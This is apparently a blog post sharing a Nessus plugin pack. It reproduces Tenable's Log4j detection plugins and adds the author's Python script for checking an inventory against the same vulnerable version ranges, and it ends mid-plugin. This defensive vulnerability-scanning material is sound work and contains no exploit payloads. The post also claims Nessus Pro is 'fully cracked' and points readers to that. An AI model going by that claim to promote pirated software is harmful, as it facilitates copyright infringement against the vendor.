Nessus latest plugin pack 20220113

Related reading

The full installation procedure was covered in an earlier post and is not repeated here.

We have also put together a summary of frequently asked questions.

Updating the software / plugins

Plugin pack download

Differences between the trial and Pro versions

  • Nessus Pro has been fully cracked; refer to the earlier article.

Other notes

NASL scripts for Log4j

Many people have asked whether there are NASL scripts for log4j. They are all in the plugin pack; just search for the keyword log4j.
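The plugins listed below are version checks: they take the Log4j version recorded by Nessus' detection plugins (or, in apache_log4j_2_13_2.nasl, parse it out of a distro package name), optionally confirm that the relevant class (JndiLookup.class, JMSAppender.class) is actually associated with the install, and then compare the version against a range. NASL only runs inside Nessus, so the following is an added Python re-statement of those ranges for offline triage of a software inventory. It is not Tenable's code and not their vcf library; the function names (ver_compare, in_range, findings, version_from_package, triage), the CHECKS table layout and the sample inventory are my own, the ranges and the package regex are copied from the scripts reproduced on this page, and pre-release tags such as 2.0-beta7 are not modelled.

```python
"""Offline triage of a Log4j inventory against the version ranges encoded in the
Nessus Log4j plugins shown on this page.  Added example, not Tenable code."""
import re

def version_key(ver: str) -> list:
    """Numeric components only: '2.17.1' -> [2, 17, 1].  Pre-release tags such as
    '2.0-beta7' are not modelled (assumption: the inventory carries release versions)."""
    return [int(x) for x in re.findall(r"\d+", ver)]

def ver_compare(a: str, b: str) -> int:
    """-1/0/1, like NASL ver_compare(strict:FALSE): the shorter version is
    zero-padded, so '2.0' == '2.0.0'."""
    ka, kb = version_key(a), version_key(b)
    n = max(len(ka), len(kb))
    ka += [0] * (n - len(ka))
    kb += [0] * (n - len(kb))
    return (ka > kb) - (ka < kb)

# (plugin file, CVE, [(min_version, max_version or None, fixed_version)], class gate)
# Ranges copied from the scripts on this page.  When a class gate is set, the plugin
# audits out (AUDIT_OS_CONF_NOT_VULN) if that class is not associated with the install.
CHECKS = [
    ("apache_log4j_1_2.nasl",    "CVE-2021-4104",  [("1.2.0", "1.2.17", "2.16.0")], "JMSAppender.class"),
    ("apache_log4j_2_13_2.nasl", "CVE-2020-9488",  [(None, None, "2.13.2")],        None),
    ("apache_log4j_2_15_0.nasl", "CVE-2021-44228", [("2.0", None, "2.15.0")],       "JndiLookup.class"),
    ("apache_log4j_2_16_0.nasl", "CVE-2021-45046", [("2.0", None, "2.16.0")],       "JndiLookup.class"),
    ("apache_log4j_2_17_0.nasl", "CVE-2021-45105", [("2.0", None, "2.17.0")],       None),
    ("apache_log4j_2_17_1.nasl", "CVE-2021-44832",
        [("2.0", None, "2.3.2"), ("2.4", None, "2.12.4"), ("2.13", None, "2.17.1")], None),
    ("apache_log4j_unsupported.nasl", None,        [(None, None, "2.0")],           None),
]

def in_range(ver, lo, hi, fixed) -> bool:
    """vcf-style constraint: lo <= ver, and ver <= hi when hi is given, else ver < fixed."""
    if lo is not None and ver_compare(ver, lo) < 0:
        return False
    if hi is not None:
        return ver_compare(ver, hi) <= 0
    return ver_compare(ver, fixed) < 0

def findings(version: str, classes_present=frozenset()) -> list:
    """(plugin, CVE, fixed_version) tuples that would fire for one install."""
    out = []
    for plugin, cve, ranges, gate in CHECKS:
        if gate is not None and gate not in classes_present:
            continue  # the plugin's "<class> association == Not Found" audit
        for lo, hi, fixed in ranges:
            if in_range(version, lo, hi, fixed):
                out.append((plugin, cve, fixed))
                break
    return out

# Package-name parsing exactly as in apache_log4j_2_13_2.nasl: capture the
# version-release, fold '-' into '.', then reject anything that is not a plain
# dotted number (the script's second regex, e.g. no '..').
PKG_RE = re.compile(r"(?:\s|^)(?:apache-)?log4j2?-([0-9.-]+[0-9]+).*")
VER_OK = re.compile(r"(?!^.*\.\..*$)^[0-9][0-9.]+?$")

def version_from_package(pkg: str):
    m = PKG_RE.search(pkg)
    if not m:
        return None
    ver = m.group(1).replace("-", ".")
    return ver if VER_OK.match(ver) else None

# Constructed sample inventory (not real hosts): the self-reported version plus
# which classes were found in the jar.
INVENTORY = [
    {"host": "app-01",    "version": "2.14.1", "classes": {"JndiLookup.class"}},
    {"host": "app-02",    "version": "2.14.1", "classes": set()},  # JndiLookup.class removed
    {"host": "legacy-01", "version": "1.2.17", "classes": {"JMSAppender.class"}},
    {"host": "app-03",    "version": "2.17.1", "classes": {"JndiLookup.class"}},
]

def triage(inventory=INVENTORY) -> dict:
    """host -> list of findings, for the whole inventory."""
    return {h["host"]: findings(h["version"], h["classes"]) for h in inventory}

if __name__ == "__main__":
    for host, hits in triage().items():
        print(host, "OK" if not hits else "; ".join(f"{p} ({c}) fixed in {f}" for p, c, f in hits))
    print(version_from_package("log4j-1.2.17-16.el7.noarch"))
```

Two things worth keeping in mind when reading the output: app-02 shows why the class gate matters (with JndiLookup.class stripped, only the DoS and the JDBC-appender checks fire, exactly as the plugins behave), and apache_log4j_2_13_2.nasl flags any package below 2.13.2 including 1.x, which is why the real plugin only reports under Settings/ParanoidReport; that setting is not modelled here.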

  • apache_log4j_1_2.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156103);
  script_version("1.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/28");

  script_cve_id("CVE-2021-4104");
  script_xref(name:"IAVA", value:"2021-A-0573");

  script_name(english:"Apache Log4j 1.2 JMSAppender Remote Code Execution (CVE-2021-4104)");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 1.2. It is, therefore, affected by a remote code execution
vulnerability when specifically configured to use JMSAppender.

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  # https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?33485eac");
  script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/security/cve/CVE-2021-4104");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.16.0 or later since 1.x is end of life.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_attribute(attribute:"agent", value:"all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-4104");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/15");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin", "apache_log4j_win_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j");

  exit(0);
}

include('vcf.inc');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app);

if (app_info['JMSAppender.class association'] == "Not Found")
  audit(AUDIT_OS_CONF_NOT_VULN, app, app_info.version);

var constraints = [{ 'min_version':'1.2.0', 'max_version':'1.2.17', 'fixed_version':'2.16.0' }];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_WARNING
);
  • apache_log4j_2_13_2.nasl
#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(136424);
  script_version("1.3");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/13");

  script_cve_id("CVE-2020-9488");
  script_xref(name:"IAVA", value:"2020-A-0196-S");

  script_name(english:"Apache Log4j < 2.13.2 Improper Certificate Verification");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by an improper certificate verification vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is < 2.13.2. It is, therefore, affected by 
an improper certificate validation vulnerability in the log4j SMTP appender. An 
attacker could leverage this vulnerability to perform a man-in-the-middle attack.

Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.");
  script_set_attribute(attribute:"see_also", value:"https://issues.apache.org/jira/browse/LOG4J2-2819");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.13.2 or later.");
  script_set_attribute(attribute:"agent", value:"unix");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-9488");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/04/13");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/04/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/05/08");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:log4j");
  script_set_attribute(attribute:"stig_severity", value:"II");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Settings/ParanoidReport");

  exit(0);
}

distros = make_list(
  'Host/RedHat/rpm-list',
  'Host/Gentoo/qpkg-list',
  'Host/SuSE/rpm-list',
  'Host/CentOS/rpm-list'
);

pkgs_list = make_array();

distro = '';

foreach pkgmgr (distros)
{
  pkgs = get_kb_item(pkgmgr);
  sep = '\n';
  if(!isnull(pkgs) && 'log4j' >< pkgs)
  {
    distro = pkgmgr;
    foreach pkg (split(pkgs,sep:sep,keep:FALSE))
    {
      match = pregmatch(pattern:"(?:\s|^)(?:apache-)?log4j2?-([0-9.-]+[0-9]+).*", string:pkg);
      if(!empty_or_null(match) && !empty_or_null(match[1]))
      {
        if("-" >< match[1])
          pkgs_list[pkg] = str_replace(string: match[1], find:'-', replace:'.');
        else pkgs_list[pkg] = match[1];
      }
    }
  }
}

flag = 0;
vulnerable_pkgs = '';

if(!empty_or_null(pkgs_list))
{
  foreach pkg (keys(pkgs_list))
  {
    ver = pkgs_list[pkg];
    if ((empty_or_null(ver)) || (ver !~ "(?!^.*\.\..*$)^[0-9][0-9.]+?$")) continue;
    if(ver_compare(ver:ver, fix:'2.13.2', strict:FALSE) < 0)
    {
      vulnerable_pkgs += '  ' + pkg + '\n';
      flag++;
    }
  }
}
else audit(AUDIT_NOT_INST, 'Apache Log4j');

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if(flag > 0)
{
  report = '\nThe following packages are associated with a vulnerable version of log4j : \n\n';
  report += vulnerable_pkgs;
  report += '\nFixed version : Log4j 2.13.2\n';
  security_report_v4(severity:SECURITY_WARNING, extra:report, port:0);
}
else audit(AUDIT_INST_VER_NOT_VULN, 'Apache Log4j');
  • apache_log4j_2_15_0.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(155999);
  script_version("1.13");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/21");

  script_cve_id("CVE-2021-44228");
  script_xref(name:"IAVA", value:"2021-A-0573");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2021/12/24");

  script_name(english:"Apache Log4j < 2.15.0 Remote Code Execution (Nix)");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 2.x < 2.15.0. It is, therefore, affected by a remote code execution
vulnerability in the JDNI parser due to improper log validation. An unauthenticated, remote attacker can exploit this
to bypass authentication and execute arbitrary commands. 

Log4j 1.x, which reached its End of Life prior to 2016, comes with JMSAppender which will perform a JNDI lookup if
enabled in Log4j's configuration file, hence customers should evaluate triggers in 1.x based on the risk that it is EOL
and whether JNDI lookups are enabled.

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://github.com/apache/logging-log4j2/pull/608");
  script_set_attribute(attribute:"see_also", value:"https://logging.apache.org/log4j/2.x/security.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.15.0 or later, or apply the vendor mitigation.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_attribute(attribute:"agent", value:"unix");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-44228");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/10");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:log4j");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j", "Host/local_checks_enabled");

  exit(0);
}

include('vcf.inc');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app);

if (app_info['JndiLookup.class association'] == "Not Found")
  audit(AUDIT_OS_CONF_NOT_VULN, app, app_info.version);

var constraints = [{ 'min_version' : '2.0', 'fixed_version' : '2.15.0' }];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_HOLE
);
  • apache_log4j_2_16_0.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156057);
  script_version("1.9");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/22");

  script_cve_id("CVE-2021-45046");
  script_xref(name:"IAVA", value:"2021-A-0573");
  script_xref(name:"IAVA", value:"2021-A-0598");
  script_xref(name:"IAVA", value:"2021-A-0597");
  script_xref(name:"IAVA", value:"2021-A-0596");

  script_name(english:"Apache Log4j 2.x < 2.16.0 RCE");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 2.x < 2.16.0. It is, therefore, affected by a remote code 
execution vulnerability. The fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain 
non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data 
when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, 
$${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using 
a JNDI Lookup pattern resulting in a remote code execution (RCE) attack.

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://github.com/advisories/GHSA-7rjr-3q55-vv33");
  script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2021-45046");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.16.0 or later, or apply the vendor mitigation.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_attribute(attribute:"agent", value:"all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-45046");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/14");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin", "apache_log4j_win_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j");

  exit(0);
}

include('vcf.inc');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app);

if (app_info['JndiLookup.class association'] == "Not Found")
  audit(AUDIT_OS_CONF_NOT_VULN, app, app_info.version);

var constraints = [{ 'min_version' : '2.0', 'fixed_version' : '2.16.0' }];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_WARNING
);
  • apache_log4j_2_16_0_mac.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156165);
  script_version("1.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/23");

  script_cve_id("CVE-2021-45046");
  script_xref(name:"IAVA", value:"2021-A-0573");
  script_xref(name:"IAVA", value:"2021-A-0596");
  script_xref(name:"IAVA", value:"2021-A-0598");

  script_name(english:"Apache Log4j 2.x < 2.16.0 RCE (MacOS)");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 2.x < 2.16.0. It is, therefore, affected by a remote code 
execution vulnerability. It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was 
incomplete in certain non-default configurations. When the logging configuration uses a non-default 
Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread 
Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an 
information leak and remote code execution in some environments and local code execution in all environments; 
remote code execution has been demonstrated on macOS but no other tested environments.

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://logging.apache.org/log4j/2.x/security.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.16.0 or later, or apply the vendor mitigation.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-45046");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/17");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"MacOS X Local Security Checks");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin", "ssh_get_info.nasl");
  script_require_keys("installed_sw/Apache Log4j", "Host/MacOSX/Version");

  exit(0);
}

include('vcf.inc');

# only seems to behave like a fully-fledged RCE for macos for so far
get_kb_item_or_exit('Host/MacOSX/Version');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app);

var constraints = [{ 'min_version' : '2.0', 'fixed_version' : '2.16.0' }];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_WARNING
);
  • apache_log4j_2_17_0.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156183);
  script_version("1.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/23");

  script_cve_id("CVE-2021-45105");
  script_xref(name:"IAVA", value:"2021-A-0573");
  script_xref(name:"IAVA", value:"2021-A-0598");

  script_name(english:"Apache Log4j 2.x < 2.17.0 DoS");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a denial of service vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 2.x < 2.17.0. It is, therefore, affected by a denial of service 
vulnerability. Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from 
self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup 
(for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious 
input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process.

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://github.com/advisories/GHSA-p6xc-xr62-6r2g");
  script_set_attribute(attribute:"see_also", value:"https://logging.apache.org/log4j/2.x/security.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.17.0 or later, or apply the vendor mitigation.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_attribute(attribute:"agent", value:"all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-45105");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/18");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin", "apache_log4j_win_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j");

  exit(0);
}

include('vcf.inc');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app);

var constraints = [{ 'min_version' : '2.0', 'fixed_version' : '2.17.0' }];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_WARNING
);
  • apache_log4j_2_17_0_mac.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
#
# @DEPRECATED@
#
# Disabled on 2020/12/19. Deprecated by apache_log4j_2_17_0.nasl.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156184);
  script_version("1.4");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/21");

  script_cve_id("CVE-2021-45105");
  
  script_xref(name:"IAVA", value:"2021-A-0573");

  script_name(english:"Apache Log4j 2.x < 2.17.0 DoS (deprecated)");

  script_set_attribute(attribute:"synopsis", value:
"This plugin has been deprecated.");
  script_set_attribute(attribute:"description", value:
"This plugin has been deprecated as a duplicated of apache_log4j_2_17_0.nasl (156183).");

  script_set_attribute(attribute:"see_also", value:"https://github.com/advisories/GHSA-p6xc-xr62-6r2g");  
  script_set_attribute(attribute:"see_also", value:"https://logging.apache.org/log4j/2.x/security.html");  

  script_set_attribute(attribute:"solution", value:
"n/a.");
  script_set_attribute(attribute:"agent", value:"unix");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-45105");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/18");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"MacOS X Local Security Checks");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin", "ssh_get_info.nasl");
  script_require_keys("installed_sw/Apache Log4j", "Host/MacOSX/Version");

  exit(0);
}

exit(0, 'This plugin has been deprecated as a duplicated of apache_log4j_2_17_0.nasl (156183). Use 156183 instead');
  • apache_log4j_2_17_1.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156327);
  script_version("1.1");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/28");

  script_cve_id("CVE-2021-44832");

  script_name(english:"Apache Log4j 2.0 < 2.3.2 / 2.4 < 2.12.4 / 2.13 < 2.17.1 RCE");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 2.0 < 2.3.2, 2.4 < 2.12.4, or 2.13 < 2.17.1. It is, therefore,
affected by a remote code execution vulnerability. Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security
fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission
to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data
source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to
the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2. 

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://logging.apache.org/log4j/2.x/security.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.17.1, 2.12.4, or 2.3.2 or later, or apply the vendor mitigation.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
